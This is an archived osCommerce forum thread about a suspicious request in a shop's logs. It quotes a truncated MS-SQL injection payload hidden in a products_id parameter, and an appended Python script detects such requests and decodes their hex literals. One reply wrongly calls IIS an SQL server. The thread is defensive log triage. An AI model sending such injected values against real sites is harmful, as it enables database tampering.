osCommerce
Is this a hack attempt


Brian-Bear

Posted

I have seen this in my last URLs list and it looks a bit nasty. What are they trying to do?

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742061

Any ideas?

Posted

I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam.

Posted
I have seen this in my last URLs list and it looks a bit nasty. What are they trying to do?

product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292...

Any ideas?

Well, it appears to be an IIS / ms-sql injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using MySQL for osCommerce (and not ms-sql) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :)

If you put "CHAR(4000) injection attack" into Google you can find out about it.
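Added example (not part of the original thread or of osCommerce): a small Python triage script that flags log lines carrying the T-SQL markers seen in the request above and decodes the hex literal passed to CAST() so it can be read. The names `decode_cast_payload`, `scan` and `SAMPLE_LOG` are hypothetical, and the sample log lines are constructed around the truncated request quoted in the thread.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Request as quoted in the thread (the page itself truncates the hex literal).
THREAD_REQUEST = ("product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);"
                  "SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292")

# Constructed sample log lines: one normal product view, one copy of the request above.
SAMPLE_LOG = [
    "GET /product_info.php?products_id=1649 HTTP/1.1",
    "GET /" + THREAD_REQUEST + " HTTP/1.1",
]

# T-SQL fragments from the thread's request that do not belong in a products_id value.
TSQL_MARKERS = re.compile(r";\s*DECLARE\s+@|CAST\s*\(\s*0x", re.IGNORECASE)
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)


def decode_cast_payload(request: str) -> Optional[str]:
    """Return the text hidden in a CAST(0x...) literal, or None if there is none."""
    match = CAST_HEX.search(unquote(request))
    if match is None:
        return None
    digits = match.group(1)
    if len(digits) % 2:  # log entry cut mid-byte: drop the stray nibble
        digits = digits[:-1]
    # latin-1 maps every byte to a character, so decoding never raises.
    return bytes.fromhex(digits).decode("latin-1")


def scan(lines):
    """Return (line, decoded payload) for each line carrying T-SQL markers."""
    hits = []
    for line in lines:
        if TSQL_MARKERS.search(unquote(line)):
            hits.append((line, decode_cast_payload(line)))
    return hits


if __name__ == "__main__":
    for line, payload in scan(SAMPLE_LOG):
        print("suspicious:", line[:60] + "...")
        print("decoded   :", payload)
```

Because the request on the page is cut off, the decoded text is only the opening of the injected statement.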

Archived

This topic is now archived and is closed to further replies.
